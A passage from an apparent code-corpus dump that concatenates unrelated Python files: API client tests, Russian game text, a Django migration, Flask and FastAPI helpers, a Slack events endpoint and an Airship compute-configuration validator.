responses.add(responses.POST, self.api_url, json=self.error_response,
status=400)
domain = Domain(client=self.client)
create_args = {
"name": "sub2.example.com",
"org_id": 4321,
"cert_types": ["other"]
}
self.assertRaises(ValueError, domain.create, **create_args)
@responses.activate
def test_create_failure_http_status_unexpected(self):
"""
The function should return an error code and description if the Domain
creation failed with DomainCreationResponseError
(unexpected HTTP status code).
"""
# Setup the mocked response
responses.add(responses.POST, self.api_url, json=self.error_response,
status=200)
domain = Domain(client=self.client)
create_args = {
"name": "sub2.example.com",
"org_id": 4321,
"cert_types": ["SSL"]
}
self.assertRaises(DomainCreationResponseError, domain.create, **create_args)
@responses.activate
def test_create_failure_missing_location_header(self):
"""
The function should return an error code and description if the Domain
creation failed with DomainCreationResponseError
(no Location header in response).
"""
# Setup the mocked response
responses.add(responses.POST, self.api_url, status=201)
domain = Domain(client=self.client)
create_args = {
"name": "sub2.example.com",
"org_id": 4321,
"cert_types": ["SSL"]
}
self.assertRaises(DomainCreationResponseError, domain.create, **create_args)
@responses.activate
def test_create_failure_domain_id_not_found(self):
"""
The function should return an error code and description if the Domain
creation failed with DomainCreationResponseError
(Domain ID not found in response).
"""
# Setup the mocked response
responses.add(responses.POST, self.api_url, headers={"Location": "not a url"}, status=201)
domain = Domain(client=self.client)
create_args = {
"name": "sub2.example.com",
"org_id": 4321,
"cert_types": ["SSL"]
}
self.assertRaises(DomainCreationResponseError, domain.create, **create_args)
class TestDelete(TestDomain):
"""Test the .delete method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.delete)
@responses.activate
def test_delete_success(self):
"""The function should return True if the deletion succeeded."""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}"
# Setup the mocked response
responses.add(responses.DELETE, api_url, status=200)
domain = Domain(client=self.client)
response = domain.delete(domain_id)
self.assertEqual(True, response)
@responses.activate
def test_delete_failure_http_error(self):
"""
The function should raise an HTTPError exception if the deletion
failed.
"""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}"
# Setup the mocked response
responses.add(responses.DELETE, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.delete, domain_id)
class TestActivate(TestDomain):
"""Test the .activate method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.activate)
@responses.activate
def test_activate_success(self):
"""The function should return True if the activation succeeded."""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}/activate"
# Setup the mocked response
responses.add(responses.PUT, api_url, status=200)
domain = Domain(client=self.client)
response = domain.activate(domain_id)
self.assertEqual(True, response)
@responses.activate
def test_activate_failure_http_error(self):
"""
The function should raise an HTTPError exception if the deletion
failed.
"""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}/activate"
# Setup the mocked response
responses.add(responses.PUT, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.activate, domain_id)
class TestSuspend(TestDomain):
"""Test the .suspend method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.suspend)
@responses.activate
def test_suspend_success(self):
"""The function should return True if the suspension succeeded."""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}/suspend"
# Setup the mocked response
responses.add(responses.PUT, api_url, status=200)
domain = Domain(client=self.client)
response = domain.suspend(domain_id)
self.assertEqual(True, response)
@responses.activate
def test_suspend_failure_http_error(self):
"""
The function should raise an HTTPError exception if the suspension
failed.
"""
domain_id = 1234
api_url = f"{self.api_url}/{str(domain_id)}/suspend"
# Setup the mocked response
responses.add(responses.PUT, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.suspend, domain_id)
class TestDelegate(TestDomain):
"""Test the .delegate method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.delegate)
@responses.activate
def test_delegate_success(self):
"""The function should return True if the delegation succeeded."""
domain_id = 1234
org_id = 4321
types = ["SSL"]
api_url = f"{self.api_url}/{str(domain_id)}/delegation"
# Setup the mocked response
responses.add(responses.POST, api_url, status=200)
domain = Domain(client=self.client)
response = domain.delegate(domain_id, org_id, types)
post_data = {
"orgId": org_id,
"certTypes": types
}
self.assertEqual(True, response)
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_delegate_failure_http_error(self):
"""The function should raise an HTTPError exception if the delegation failed."""
domain_id = 1234
org_id = 4321
types = ["SSL"]
api_url = f"{self.api_url}/{str(domain_id)}/delegation"
# Setup the mocked response
responses.add(responses.POST, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.delegate, domain_id, org_id, types)
class TestRemoveDelegation(TestDomain):
"""Test the .remove_delegation method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.remove_delegation)
@responses.activate
def test_remove_delegation_success(self):
"""The function should return True if the delegation removal succeeded."""
domain_id = 1234
org_id = 4321
types = ["SSL"]
api_url = f"{self.api_url}/{str(domain_id)}/delegation"
# Setup the mocked response
responses.add(responses.DELETE, api_url, status=200)
domain = Domain(client=self.client)
response = domain.remove_delegation(domain_id, org_id, types)
post_data = {
"orgId": org_id,
"certTypes": types
}
self.assertEqual(True, response)
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_remove_delegation_failure_http_error(self):
"""The function should raise an HTTPError exception if the delegation removal failed."""
domain_id = 1234
org_id = 4321
types = ["SSL"]
api_url = f"{self.api_url}/{str(domain_id)}/delegation"
# Setup the mocked response
responses.add(responses.DELETE, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.remove_delegation, domain_id, org_id, types)
class TestApproveDelegation(TestDomain):
"""Test the .approve_delegation method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.approve_delegation)
@responses.activate
def test_approve_delegation_success(self):
"""The function should return True if the approval succeeded."""
domain_id = 1234
org_id = 4321
api_url = f"{self.api_url}/{str(domain_id)}/delegation/approve"
# Setup the mocked response
responses.add(responses.POST, api_url, status=200)
domain = Domain(client=self.client)
response = domain.approve_delegation(domain_id, org_id)
post_data = {
"orgId": org_id,
}
self.assertEqual(True, response)
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_approval_failure_http_error(self):
"""The function should raise an HTTPError exception if the approval failed."""
domain_id = 1234
org_id = 4321
api_url = f"{self.api_url}/{str(domain_id)}/delegation/approve"
# Setup the mocked response
responses.add(responses.POST, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.approve_delegation, domain_id, org_id)
class TestRejectDelegation(TestDomain):
"""Test the .reject_delegation method."""
@responses.activate
def test_need_params(self):
"""
The function should raise an exception when called without required
parameters.
"""
domain = Domain(client=self.client)
# missing domain_id
self.assertRaises(TypeError, domain.reject_delegation)
@responses.activate
def test_reject_delegation_success(self):
"""The function should return True if the rejection succeeded."""
domain_id = 1234
org_id = 4321
api_url = f"{self.api_url}/{str(domain_id)}/delegation/reject"
# Setup the mocked response
responses.add(responses.POST, api_url, status=200)
domain = Domain(client=self.client)
response = domain.reject_delegation(domain_id, org_id)
post_data = {
"orgId": org_id,
}
self.assertEqual(True, response)
self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8"))
@responses.activate
def test_reject_failure_http_error(self):
"""The function should raise an HTTPError exception if the rejection failed."""
domain_id = 1234
org_id = 4321
api_url = f"{self.api_url}/{str(domain_id)}/delegation/reject"
# Setup the mocked response
responses.add(responses.POST, api_url, status=404)
domain = Domain(client=self.client)
self.assertRaises(HTTPError, domain.reject_delegation, domain_id, org_id)
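# Summary of the client-side API these tests exercise (given an already-authenticated
# `client` object from this package):
#   Domain(client=client).all() / .find(name=...) / .count() / .get(domain_id)
#   .create(name, org_id, cert_types, description=...) / .delete(domain_id)
#   .activate(domain_id) / .suspend(domain_id)
#   .delegate(domain_id, org_id, cert_types) / .remove_delegation(domain_id, org_id, cert_types)
#   .approve_delegation(domain_id, org_id) / .reject_delegation(domain_id, org_id)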
| 2.75 | 3 |
texts.py | ProtKsen/pgame | 2 | 4908 | <reponame>ProtKsen/pgame
"""Text parts."""
SEPARATOR = '----------------------------------'
CONT_GAME = 'enter для продолжения игры'
GREETING = 'Добро пожаловать в игру ''Сундук сокровищ''!\n' \
'Попробуй себя в роли капитана корабля, собери ' \
'команду и достань все сокровища!'
NAME_QUESTION = 'Как тебя зовут?'
CHOOSE_LEVEL = 'Выбери уровень сложности, он влияет на стоимость ' \
'сокровищ на островах. \n' \
'1 - легко \n' \
'2 - средне \n' \
'3 - тяжело'
INTRODUCTION = 'В наследство от дядюшки тебе достался корабль, \n' \
'несколько золотых монет и карта, на которой \n' \
'отмечены 10 островов. На каждом из островов \n' \
'зарыт клад. Но для того, чтобы достать его, \n' \
'необходимо обезвредить ловушку. Чем больше \n' \
'порядковый номер острова, тем ценнее хранящееся \n' \
'на нем сокровище и тем труднее его получить. \n\n' \
'Цель игры - добыть все сокровища и скопить как можно больше монет. \n\n' \
'Команда твоего корабля сможет обезвредить ловушку, \n' \
'только если будет иметь нужное количество очков \n' \
'логики, силы и ловкости. \n\n' \
'!!! Сумма всех требуемых очков равна номеру острова,\n' \
'но точная комбинация тебе неизвестна. !!!'
ORACLE_QUESTION = 'Здесь неподалеку живет известный оракул. За определенную\n' \
'плату он сможет предсказать с какой ловушкой\n' \
'ты столкнешься на острове. Пойдешь ли ты к нему?\n' \
'----------------------------------\n'\
'1 - да, пойду\n' \
'2 - нет, сам разберусь'
ORACLE_QUESTION_1 = 'Что ты хочешь узнать у оракула? \n' \
'----------------------------------\n'\
'1 - я передумал, буду сам себе оракул! \n'\
'2 - сколько очков логики должно быть у команды? (1 монета) \n'\
'3 - сколько очков силы должно быть у команды? (1 монета) \n'\
'4 - сколько очков ловкости должно быть у команды? (1 монета) \n'\
'5 - узнать все требуемые характеристики (3 монеты)'
ORACLE_QUESTION_2 = 'Что ты хочешь узнать у оракула? \n' \
'----------------------------------\n'\
'1 - я передумал, буду сам себе оракул! \n'\
'2 - сколько очков логики должно быть у команды? (1 монета) \n'\
'3 - сколько очков силы должно быть у команды? (1 монета) \n'\
'4 - сколько очков ловкости должно быть у команды? (1 монета)'
GO_TAVERN_TEXT = 'Отлично! Для похода на остров тебе понадобится \n' \
'команда, а нанять ее ты сможешь в таверне.'
EXIT_QUESTION = 'Продолжить игру?\n' \
'----------------------------------\n'\
'1 - да\n' \
'2 - нет'
SUCCESS_STEP = 'Поздравляю! Ты смог достать спрятанное сокровище! \n' \
'Самое время готовиться к следующему походу.'
FAILURE_STEP = 'К сожалению, ты не смог достать сокровище. \n' \
'Если у тебя еще остались монеты, то можешь \n' \
'попробовать организовать поход заново. Удачи!'
WINNING = 'Поздравляю! Ты собрал сокровища со всех окрестных \n' \
'островов, можешь выкинуть ненужную теперь карту) \n' \
'Конец игры.'
LOSING = 'Сожалею, ты потратил все деньги. Карьера пиратского \n' \
'капитана подошла к концу. А дядюшка в тебя верил! \n' \
'Конец игры.'
NAMES = ['Боб', 'Ричард', 'Алан', 'Степан', 'Грозный Глаз', 'Гарри',
'Моррис', 'Джек', 'Алекс', 'Сэм', 'Том', 'Янис', 'Геральт',
'Ринсвинд', 'Купер', 'Борис', 'Джон', 'Рон']
| 2.328125 | 2 |
api/migrations/0001_initial.py | alerin345/Instagram-React | 0 | 4909 | <gh_stars>0
# Generated by Django 3.1.3 on 2021-01-07 00:42
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Image',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('picture', models.ImageField(null=True, upload_to='')),
('description', models.TextField(blank=True, default='')),
('likes', models.IntegerField(default=0)),
('comments', models.IntegerField(default=0)),
('date', models.DateTimeField(default=django.utils.timezone.now)),
('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Subscription',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='user', to=settings.AUTH_USER_MODEL)),
('userSubscribed', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='userSubscribed', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Profile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('picture', models.ImageField(blank=True, default='default.png', null=True, upload_to='')),
('description', models.TextField(blank=True, default='')),
('user', models.OneToOneField(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Like',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='api.image')),
('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('value', models.TextField()),
('date', models.DateTimeField(default=django.utils.timezone.now)),
('image', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='api.image')),
('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.AddConstraint(
model_name='subscription',
constraint=models.UniqueConstraint(fields=('user', 'userSubscribed'), name='unique subscribes'),
),
migrations.AddConstraint(
model_name='like',
constraint=models.UniqueConstraint(fields=('image', 'user'), name='unique likes'),
),
]
| 1.734375 | 2 |
fastapi_router_controller/lib/controller_loader.py | KiraPC/fastapi-router-controller | 21 | 4910 | <reponame>KiraPC/fastapi-router-controller
import os
import importlib
class ControllerLoader:
"""
The ControllerLoader class.
"""
@staticmethod
def load(directory, package):
"""
It is a utility to automatically load all the Python
modules present in a given directory
"""
for module in os.listdir(directory):
sub_dir = directory + "/" + module
if os.path.isdir(sub_dir):
ControllerLoader.load(sub_dir, "{}.{}".format(package, module))
if module == "__init__.py" or module[-3:] != ".py":
continue
else:
module_import_name = "{}.{}".format(package, module[:-3])
importlib.import_module(module_import_name)
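# Hypothetical usage sketch; the "controllers" directory and the "app.controllers"
# package name are assumptions for illustration only:
import os
from fastapi_router_controller.lib.controller_loader import ControllerLoader

controllers_dir = os.path.join(os.path.dirname(__file__), "controllers")
ControllerLoader.load(controllers_dir, "app.controllers")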
| 3.0625 | 3 |
app/mod_ecomm/controllers.py | VikrantReddy/Instagram2Shop | 0 | 4911 | from flask import Blueprint, Flask, send_from_directory
from werkzeug.security import check_password_hash, generate_password_hash
from app import db
from app.mod_auth.forms import LoginForm
from app.mod_auth.models import User
mod_ecomm = Blueprint('products', __name__, url_prefix='/products',
static_folder='../../frontend/build')
@mod_ecomm.route("/", defaults={'path': ''})
def serve(path):
if path:
return send_from_directory(mod_ecomm.static_folder, path)
else:
return send_from_directory(mod_ecomm.static_folder, 'index.html')
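# Registration sketch (the app object shown here is an assumption; the real Flask
# app lives in the `app` package of this repo):
# from flask import Flask
# from app.mod_ecomm.controllers import mod_ecomm
# app = Flask(__name__)
# app.register_blueprint(mod_ecomm)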
| 1.609375 | 2 |
dagr_selenium/crawl_watchlist.py | phillmac/dagr_selenium | 0 | 4912 | from .functions import monitor_watchlist_action, manager
with manager.get_dagr():
monitor_watchlist_action()
| 1.25 | 1 |
zenslackchat/eventsview.py | uktrade/zenslackchat | 2 | 4913 | import pprint
import logging
from django.conf import settings
from rest_framework import status
from rest_framework.views import APIView
from rest_framework.response import Response
from zenslackchat.message import handler
from zenslackchat.models import SlackApp
from zenslackchat.models import ZendeskApp
class Events(APIView):
"""Handle Events using the webapp instead of using the RTM API.
This is handy as I don't need to run a specific bot process just to handle
events. Instead I can just use the webapp REST API for this.
Handy documentation for Slack events: https://api.slack.com/events-api
The app needs to subscribe to events to receive them. From
https://api.slack.com/apps/<APP ID>/event-subscriptions you need to:
- Enable Events from "Off" to "On"
- Enter the "Request URL" e.g.: http://<instance id>.ngrok.io/slack/events/
- Then "Subscribe to events on behalf of users"
- Click "Add Workspace Event" and add "message.channels".
Messages on channels will now start being received. The bot will need to be
invited to a channel first.
"""
def post(self, request, *args, **kwargs):
"""Events will come in over a POST request.
"""
log = logging.getLogger(__name__)
slack_message = request.data
if slack_message.get('token') != settings.SLACK_VERIFICATION_TOKEN:
log.error("Slack message verification failed!")
return Response(status=status.HTTP_403_FORBIDDEN)
# verification challenge, convert to signature verification instead:
if slack_message.get('type') == 'url_verification':
return Response(data=slack_message, status=status.HTTP_200_OK)
if 'event' in slack_message:
event = slack_message.get('event')
if settings.DEBUG:
log.debug(f'event received:\n{pprint.pformat(event)}\n')
try:
handler(
event,
our_channel=settings.SRE_SUPPORT_CHANNEL,
slack_client=SlackApp.client(),
zendesk_client=ZendeskApp.client(),
workspace_uri=settings.SLACK_WORKSPACE_URI,
zendesk_uri=settings.ZENDESK_TICKET_URI,
user_id=settings.ZENDESK_USER_ID,
group_id=settings.ZENDESK_GROUP_ID,
)
except: # noqa
# I want all events even if they cause me problems. If I don't
# accept, the webhook will be marked as broken and then no more
# events will be sent.
log.exception("Slack message_handler error: ")
return Response(status=status.HTTP_200_OK)
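# Typical URL wiring for this view (the urls.py module location is an assumption);
# the "Request URL" mentioned in the class docstring would then resolve to it:
# from django.urls import path
# from zenslackchat.eventsview import Events
# urlpatterns = [path("slack/events/", Events.as_view())]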
| 2.140625 | 2 |
sdv/docker/sdvstate/internal/validator/airship/compute_check.py | opnfv/cirv-sdv | 2 | 4914 | <gh_stars>1-10
# Copyright 2020 University Of Delhi.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Compute Related Checks
"""
import configparser
import json
import re
import logging
from tools.kube_utils import kube_exec, get_pod_with_labels
from tools.conf import settings
from internal import store_result
###########
# Checks
###########
def isolated_cores_check():
"""
isolated_cores_check
"""
logger = logging.getLogger(__name__)
traced_value = trace_isolated_cores()
required_value = required_isolated_cores()
result = {'category': 'compute',
'case_name': 'isolated_cores_check',
'details': {'traced_cores': traced_value,
'required_cores': required_value
}
}
if is_ranges_equals(traced_value, required_value):
result['criteria'] = 'pass'
else:
result['criteria'] = 'fail'
store_result(logger, result)
return result
def reserved_vnf_cores_check():
"""
reserved_vnf_cores_check
"""
logger = logging.getLogger(__name__)
traced_value = trace_reserved_vnf_cores()
required_value = required_reserved_vnf_cores()
result = {'category': 'compute',
'case_name': 'reserved_vnf_cores_check',
'details': {'traced_cores': traced_value,
'required_cores': required_value
}
}
if is_ranges_equals(traced_value, required_value):
result['criteria'] = 'pass'
else:
result['criteria'] = 'fail'
store_result(logger, result)
return result
def vswitch_pmd_cores_check():
"""
vswitch_pmd_cores_check
"""
logger = logging.getLogger(__name__)
traced_value = trace_vswitch_pmd_cores()
required_value = required_vswitch_pmd_cores()
result = {'category': 'compute',
'case_name': 'vswitch_pmd_cores_check',
'details': {'traced_cores': traced_value,
'required_cores': required_value
}
}
if is_ranges_equals(traced_value, required_value):
result['criteria'] = 'pass'
else:
result['criteria'] = 'fail'
store_result(logger, result)
return result
def vswitch_dpdk_lcores_check():
"""
vswitch_dpdk_lcores_check
"""
logger = logging.getLogger(__name__)
traced_value = trace_vswitch_dpdk_lcores()
required_value = required_vswitch_dpdk_lcores()
result = {'category': 'compute',
'case_name': 'vswitch_dpdk_lcores_check',
'details': {'traced_cores': traced_value,
'required_cores': required_value
}
}
if is_ranges_equals(traced_value, required_value):
result['criteria'] = 'pass'
else:
result['criteria'] = 'fail'
store_result(logger, result)
return result
def os_reserved_cores_check():
"""
os_reserved_cores_check
"""
logger = logging.getLogger(__name__)
traced_value = trace_os_reserved_cores()
required_value = required_os_reserved_cores()
result = {'category': 'compute',
'case_name': 'os_reserved_cores_check',
'details': {'traced_cores': traced_value,
'required_cores': required_value
}
}
if is_ranges_equals(traced_value, required_value):
result['criteria'] = 'pass'
else:
result['criteria'] = 'fail'
store_result(logger, result)
return result
def nova_scheduler_filters_check():
"""
nova_scheduler_filters_check
"""
logger = logging.getLogger(__name__)
traced_value = trace_nova_scheduler_filters()
required_value = required_nova_scheduler_filters()
result = {'category': 'compute',
'case_name': 'nova_scheduler_filters_check',
'details': {'traced_filters': traced_value,
'required_filters': required_value
}
}
if are_lists_equal(traced_value, required_value):
result['criteria'] = 'pass'
else:
result['criteria'] = 'fail'
store_result(logger, result)
return result
def cpu_allocation_ratio_check():
"""
cpu_allocation_ratio_check
"""
logger = logging.getLogger(__name__)
traced_value = trace_cpu_allocation_ratio()
required_value = required_cpu_allocation_ratio()
result = {'category': 'compute',
'case_name': 'cpu_allocation_ratio_check',
'details': {'traced_ratio': traced_value,
'required_ratio': required_value
}
}
if traced_value == required_value:
result['criteria'] = 'pass'
else:
result['criteria'] = 'fail'
store_result(logger, result)
return result
###############
# helper functions
###############
def trace_isolated_cores():
"""
Trace isolated_cores from Airship deployment
:return: value traced from `isolcpus` key in `/proc/cmdline`
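        e.g. a cmdline containing ``isolcpus=2-19`` (illustrative value) yields '2-19'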
"""
pod = get_pod_with_labels('application=nova,component=compute')
cmd = ['cat', '/proc/cmdline']
proc_cmd = kube_exec(pod, cmd)
    isolcpus_value = ''
    for option in proc_cmd.split():
        if 'isolcpus' in option:
            _, isolcpus_value = split_key_value(option)
            break
    return isolcpus_value
def required_isolated_cores():
"""
Returns value of `isolated_cpus` from platform_profile used by
Role for worker nodes in PDF
:return: isolated_cores value expected by the PDF
"""
worker_role = settings.getValue('WORKER_ROLE_NAME')
profile = get_platform_profile_by_role(worker_role)
return profile['isolated_cpus']
def trace_reserved_vnf_cores():
"""
Trace vnf_reserved_cores from Airship deployment
:return: value traced from `vcpu_pin_set` key in nova.conf
of actual deployment
"""
try:
config = get_nova_conf()
vcpu_pin_set = config.get('DEFAULT', 'vcpu_pin_set')
except (configparser.NoOptionError, configparser.MissingSectionHeaderError):
vcpu_pin_set = ''
return vcpu_pin_set
def required_reserved_vnf_cores():
"""
Returns value of vnf_cores from platform_profile used by
Role for worker nodes in PDF
    :return: vnf_reserved_cores value expected by the PDF
"""
worker_role = settings.getValue('WORKER_ROLE_NAME')
profile = get_platform_profile_by_role(worker_role)
return profile['vnf_cores']
def trace_vswitch_pmd_cores():
"""
Trace vswitch_pmd_cores from Airship deployment
:return: value traced from `other_config:pmd-cpu-mask` in
openvswitchdb using ovs-vsctl
"""
ovs_pod = get_pod_with_labels('application=openvswitch,component=openvswitch-vswitchd')
cmd = ['ovs-vsctl', '-t', '5', 'get', 'Open_vSwitch', '.', 'other_config']
response = kube_exec(ovs_pod, cmd)
# convert config str to json str
match = re.findall("[a-zA-Z0-9-]+=", response)
for key in match:
response = response.replace(key, '"' + key[:-1] + '":')
match = re.findall(":[a-zA-Z0-9-]+", response)
for key in match:
response = response.replace(key[1:], '"' + key[1:] + '"')
config = json.loads(response)
if 'pmd-cpu-mask' in config:
pmd_cores = hex_to_comma_list(config['pmd-cpu-mask'])
else:
pmd_cores = ''
return pmd_cores
def required_vswitch_pmd_cores():
"""
Returns value of vswitch_pmd_cores from platform_profile used by
Role for worker nodes in PDF
:return: vswitch_pmd_cores value expected by the PDF
"""
worker_role = settings.getValue('WORKER_ROLE_NAME')
profile = get_platform_profile_by_role(worker_role)
return profile['vswitch_pmd_cores']
def trace_vswitch_dpdk_lcores():
"""
Trace vswitch_dpdk_lcores from Airship deployment
:return: value traced from `other_config:dpdk-lcore-mask` in
openvswitchdb using ovs-vsctl
"""
ovs_pod = get_pod_with_labels('application=openvswitch,component=openvswitch-vswitchd')
cmd = ['ovs-vsctl', '-t', '5', 'get', 'Open_vSwitch', '.', 'other_config']
response = kube_exec(ovs_pod, cmd)
# convert config str to json str
match = re.findall("[a-zA-Z0-9-]+=", response)
for key in match:
response = response.replace(key, '"' + key[:-1] + '":')
match = re.findall(":[a-zA-Z0-9-]+", response)
for key in match:
response = response.replace(key[1:], '"' + key[1:] + '"')
config = json.loads(response)
if 'dpdk-lcore-mask' in config:
pmd_cores = hex_to_comma_list(config['dpdk-lcore-mask'])
else:
pmd_cores = ''
return pmd_cores
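def _example_other_config_to_json():
    """
    Hedged sketch of the string-to-json rewrite used by the two ovs-vsctl
    tracers above, run on a made-up other_config string (not output captured
    from a real vswitchd pod; mask values are chosen to avoid substring
    clashes during the replace steps).
    """
    import json
    import re
    response = '{pmd-cpu-mask=aa, dpdk-lcore-mask=f}'
    for key in re.findall("[a-zA-Z0-9-]+=", response):
        response = response.replace(key, '"' + key[:-1] + '":')
    for key in re.findall(":[a-zA-Z0-9-]+", response):
        response = response.replace(key[1:], '"' + key[1:] + '"')
    config = json.loads(response)
    # hex mask 'aa' has bits 1, 3, 5 and 7 set, so this returns '1,3,5,7'
    return hex_to_comma_list(config['pmd-cpu-mask'])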
def required_vswitch_dpdk_lcores():
"""
Returns value of vswitch_dpdk_lcores from platform_profile used by
Role for worker nodes in PDF
:return: vswitch_dpdk_lcores value expected by the PDF
"""
worker_role = settings.getValue('WORKER_ROLE_NAME')
profile = get_platform_profile_by_role(worker_role)
return profile['vswitch_dpdk_lcores']
def trace_os_reserved_cores():
"""
Trace os_reserved_cores from Airship deployment
os_reserved_cores = all_cores - (reserved_vnf_cores +
vswitch_pmd_cores +
vswitch_dpdk_lcores)
"""
worker_role = settings.getValue('WORKER_ROLE_NAME')
all_cores = get_cores_by_role(worker_role)
reserved_vnf_cores = trace_reserved_vnf_cores()
vswitch_pmd_cores = trace_vswitch_pmd_cores()
vswitch_dpdk_lcores = trace_vswitch_dpdk_lcores()
non_os_cores = []
non_os_cores.extend(convert_range_to_list(reserved_vnf_cores))
non_os_cores.extend(convert_range_to_list(vswitch_pmd_cores))
non_os_cores.extend(convert_range_to_list(vswitch_dpdk_lcores))
os_reserved_cores = set(all_cores).difference(set(non_os_cores))
# return as string with comma separated value
return ','.join(map(str, list(os_reserved_cores)))
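def _example_os_reserved_cores():
    """
    Hedged illustration of the subtraction above with made-up core numbers
    (not values from a real PDF): with cores 0-7, VNF cores 2-5, PMD core 6
    and DPDK lcore 7, the OS keeps cores 0 and 1.
    """
    all_cores = list(range(8))
    non_os_cores = [2, 3, 4, 5] + [6] + [7]
    os_reserved_cores = set(all_cores).difference(set(non_os_cores))
    return ','.join(map(str, sorted(os_reserved_cores)))  # -> '0,1'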
def required_os_reserved_cores():
"""
Returns value of os_reserved_cores from platform_profile used by
Role for worker nodes in PDF
:return: os_reserved_cores value expected by the PDF
"""
worker_role = settings.getValue('WORKER_ROLE_NAME')
profile = get_platform_profile_by_role(worker_role)
return profile['os_reserved_cores']
def trace_nova_scheduler_filters():
"""
Trace scheduler_filters from Airship deployment
:return: value traced from `enabled_filters` key in nova.conf
of actual deployment
"""
try:
config = get_nova_conf()
filters = config.get('filter_scheduler', 'enabled_filters')
except (configparser.NoOptionError, configparser.MissingSectionHeaderError):
filters = ''
    filters = [current_filter.strip() for current_filter in filters.split(',')]
return filters
def required_nova_scheduler_filters():
"""
Required nova scheduler_filters by the PDF
"""
pdf = settings.getValue('pdf_file')
filters = pdf['vim_functional']['scheduler_filters']
    filters = [current_filter.strip() for current_filter in filters.split(',')]
return filters
def trace_cpu_allocation_ratio():
"""
Trace cpu_allocation_ratio from Airship deployment
:return: value traced from `cpu_allocation_ratio` key in nova.conf
of actual deployment
"""
try:
config = get_nova_conf()
cpu_allocation_ratio = config.get('DEFAULT', 'cpu_allocation_ratio')
except (configparser.NoOptionError, configparser.MissingSectionHeaderError):
cpu_allocation_ratio = ''
    # guard against float('') when the option is missing from nova.conf
    return float(cpu_allocation_ratio) if cpu_allocation_ratio else 0.0
def required_cpu_allocation_ratio():
"""
Required cpu_allocation_ratio by the PDF
"""
pdf = settings.getValue('pdf_file')
cpu_allocation_ratio = pdf['vim_functional']['cpu_allocation_ratio']
return float(cpu_allocation_ratio)
def get_role(role_name):
"""
Searches and returns role with `role_name`
"""
roles = settings.getValue('pdf_file')['roles']
    role_details = None
    for role in roles:
        if role['name'] == role_name:
            role_details = role
            break
    return role_details
def get_platform_profile(profile_name):
"""
Searches and returns platform_profile with `profile_name`
"""
platform_profiles = settings.getValue('pdf_file')['platform_profiles']
    profile_details = None
    for profile in platform_profiles:
        if profile['profile_name'] == profile_name:
            profile_details = profile
            break
    return profile_details
def get_processor_profile(profile_name):
"""
Searches and returns processor_profile with `profile_name`
"""
processor_profiles = settings.getValue('pdf_file')['processor_profiles']
    profile_details = None
    for profile in processor_profiles:
        if profile['profile_name'] == profile_name:
            profile_details = profile
            break
    return profile_details
def get_platform_profile_by_role(role_name):
"""
Returns platform profile details of a role
"""
role = get_role(role_name)
